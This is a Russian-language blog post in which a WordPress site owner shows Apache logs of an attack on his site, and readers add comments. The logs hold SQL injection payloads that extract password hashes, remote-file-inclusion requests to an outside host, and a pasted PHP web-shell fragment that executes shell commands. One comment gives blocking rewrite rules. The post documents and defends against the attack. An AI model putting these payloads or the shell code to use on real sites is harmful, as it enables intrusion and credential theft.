Картинка блога

Наконец-то отошел от летних отпусков. 🙂

Разглядываю такой логи доступа и ошибок апача, и натыкаюсь вот на такую вот вещь.

66.63.167.50 - - [23/Aug/2009:06:48:48 -0700] "POST /wp-trackback.php?tb_id=1 HTTP/1.1" 200 376 "-" "Mozilla/4.0 (compatible; 6.0; Windows NT 5.1"
66.63.167.50 - - [23/Aug/2009:06:48:48 -0700] "POST /xmlrpc.php HTTP/1.1" 200 7463 "-" "Mozilla/4.0 (compatible; 6.0; Windows NT 5.1"
66.63.167.50 - - [23/Aug/2009:06:48:49 -0700] "GET /xmlrpc.php HTTP/1.1" 200 242 "-" "Mozilla/4.0 (compatible; 6.0; Windows NT 5.1"
66.63.167.50 - - [23/Aug/2009:06:48:49 -0700] "POST /xmlrpc.php HTTP/1.1" 200 593 "-" "Mozilla/4.0 (compatible; 6.0; Windows NT 5.1"
....
66.63.167.50 - - [23/Aug/2009:06:49:10 -0700] "GET /index.php?cat=%2527+UNION+SELECT+CONCAT(666,CHAR(58),user_pass,CHAR(58),666,CHAR(58))+FROM+wp_users+where+id=1/* HTTP/1.1" 503 532 "-" "Mozilla/4.0 (compatible; 6.0; Windows NT 5.1"
66.63.167.50 - - [23/Aug/2009:06:49:10 -0700] "GET /index.php?cat=999+UNION+SELECT+null,CONCAT(666,CHAR(58),user_pass,CHAR(58),666,CHAR(58)),null,null,null+FROM+wp_users+where+id=1/* HTTP/1.1" 503 532 "-" "Mozilla/4.0 (compatible; 6.0; Windows NT 5.1"
66.63.167.50 - - [23/Aug/2009:06:49:10 -0700] "GET / HTTP/1.1" 200 78085 "-" "Mozilla/4.0 (compatible; 6.0; Windows NT 5.1"
66.63.167.50 - - [23/Aug/2009:06:49:11 -0700] "GET /youtube-view HTTP/1.1" 200 59811 "-" "Mozilla/4.0 (compatible; 6.0; Windows NT 5.1"
66.63.167.50 - - [23/Aug/2009:06:49:00 -0700] "POST /xmlrpc.php HTTP/1.1" 200 593 "-" "Mozilla/4.0 (compatible; 6.0; Windows NT 5.1"
66.63.167.50 - - [23/Aug/2009:06:49:12 -0700] "GET /about HTTP/1.1" 200 58090 "-" "Mozilla/4.0 (compatible; 6.0; Windows NT 5.1"
66.63.167.50 - - [23/Aug/2009:06:49:14 -0700] "GET /wp-content/plugins/wp-cal/functions/editevent.php?id=-1' HTTP/1.1" 200 58470 "-" "Mozilla/4.0 (compatible; 6.0; Windows NT 5.1"
66.63.167.50 - - [23/Aug/2009:06:49:15 -0700] "GET /wp-content/plugins/fgallery/fim_rss.php?album=-1' HTTP/1.1" 200 58358 "-" "Mozilla/4.0 (compatible; 6.0; Windows NT 5.1"
66.63.167.50 - - [23/Aug/2009:06:49:16 -0700] "GET /wp-content/plugins/wp-adserve/adclick.php?id=-1+union+select+0x6875616B HTTP/1.1" 200 58307 "-" "Mozilla/4.0 (compatible; 6.0; Windows NT 5.1"
66.63.167.50 - - [23/Aug/2009:06:49:17 -0700] "GET /wp-content/plugins/wassup/spy.php?to_date=to_date HTTP/1.1" 503 532 "-" "Mozilla/4.0 (compatible; 6.0; Windows NT 5.1"
66.63.167.50 - - [23/Aug/2009:06:49:17 -0700] "GET /wp-content/plugins/wordspew/wordspew-rss.php?id=id' HTTP/1.1" 200 58216 "-" "Mozilla/4.0 (compatible; 6.0; Windows NT 5.1"
66.63.167.50 - - [23/Aug/2009:06:49:17 -0700] "GET /wp-content/plugins/st_newsletter/shiftthis-preview.php?newsletter=-1' HTTP/1.1" 200 58192 "-" "Mozilla/4.0 (compatible; 6.0; Windows NT 5.1"
......
211.206.123.177 - - [23/Aug/2009:17:48:23 -0700] "GET /748-transliteraciya-rus-2-lat-na-c//?_SERVER[DOCUMENT_ROOT]=http://www.seorakhoney.com/shop/fx29id2.txt?? HTTP/1.1" 503 532 "-" "Mozilla/5.0"
211.206.123.177 - - [23/Aug/2009:17:48:23 -0700] "GET //?_SERVER[DOCUMENT_ROOT]=http://www.seorakhoney.com/shop/fx29id2.txt?? HTTP/1.1" 503 532 "-" "Mozilla/5.0"
...

Прощупывают слабые места… Один богатырь учит SQL инъекции, другой вообще мир обмануть хочет. Вот козлы!

Скрипт fx29id2 какой-то интересный, собирает наверно очень интересную информацию. Интересно, что автор хотел этим сказать…


"; }
function safemode() { return (@ini_get("safe_mode") OR eregi("on",@ini_get("safe_mode")) ) ? TRUE : FALSE; }
function getdisfunc() { $rez = explode(",",@ini_get("disable_functions")); return (!empty($rez))?$rez:array(); }
function enabled($func) { return (function_exists($func) && is_callable($func) && !in_array($func,getdisfunc())) ? TRUE : FALSE; }
function fx29exec($cmd) {
if (enabled("exec")) { exec($cmd,$o); $rez = join("\r\n",$o); }
elseif (enabled("shell_exec")) { $rez = shell_exec($cmd); }
elseif (enabled("system")) { @ob_start(); @system($cmd); $rez = @ob_get_contents(); @ob_end_clean(); }
elseif (enabled("passthru")) { @ob_start(); passthru($cmd); $rez = @ob_get_contents(); @ob_end_clean(); }
elseif (enabled("popen") && is_resource($h = popen($cmd.' 2>&1', 'r')) ) { while ( !feof($h) ) { $rez .= fread($h, 2096); } pclose($h); }
else { $rez = "Error!"; }
return $rez;
}
function vsize($size) {
if (!is_numeric($size)) { return FALSE; }
else {
if ( $size >= 1073741824 ) { $size = round($size/1073741824*100)/100 ." GB"; }
elseif ( $size >= 1048576 ) { $size = round($size/1048576*100)/100 ." MB"; }
elseif ( $size >= 1024 ) { $size = round($size/1024*100)/100 ." KB"; }
else { $size = $size . " B"; }
return $size;
}
}
function hdd($type) {
$P = @getcwd(); $T = @disk_total_space($P); $F = @disk_free_space($P); $U = $T - $U;
$hddspace = array("total" => vsize($T), "free" => vsize($F), "used" => vsize($U));
return $hddspace[$type];
}
die("FeeLCoMz");
?>

Похожие статьи

    Нет похожих статей.

6 комментариев в “Меня ломают!”

  1. RewriteEngine On

    RewriteCond %{QUERY_STRING} [^?]*\? [OR]
    RewriteCond %{QUERY_STRING} (\.\./|\.\.\\) [OR]
    RewriteCond %{QUERY_STRING} (///) [OR]
    RewriteCond %{THE_REQUEST} «^(GET|POST) /?https?:» [OR]
    RewriteCond %{THE_REQUEST} «^(GET|POST|HEAD) //»
    RewriteRule (.*) $1 [F]

    RewriteBase /
    RewriteCond %{REQUEST_FILENAME} !-f
    RewriteCond %{REQUEST_FILENAME} !-d
    RewriteRule . /index.php [L]

  2. Спасиб, попробую.

  3. А у вас движок на сайте word press? Что — то дыр в нем в чистом вообще страшно. Мне тоже сайт пытались взломать…

  4. И меня сегодня пытались сломать


    /index.php?cat=%2527+UNION+SELECT+CONCAT(666,CHAR(58),user_pass,CHAR(58),666,CHAR(58))+FROM+wp_users+where+id=1/*

    999+UNION+SELECT+null,CONCAT(666,CHAR(58),user_pass,CHAR(58),666,CHAR(58)),null,null,null+FROM+wp_users+where+id=1/*

    /wp-content/plugins/wp-adserve/adclick.php?id=-1+union+select+0x6875616B

    с того же IP 66.63.167.50

  5. Ммда… В гугле ИП капитально засветился. Ребята явно не ради развлечения это делают…

  6. Писать можно бесконечно , поэтому просто поблагодарю. Спасибо!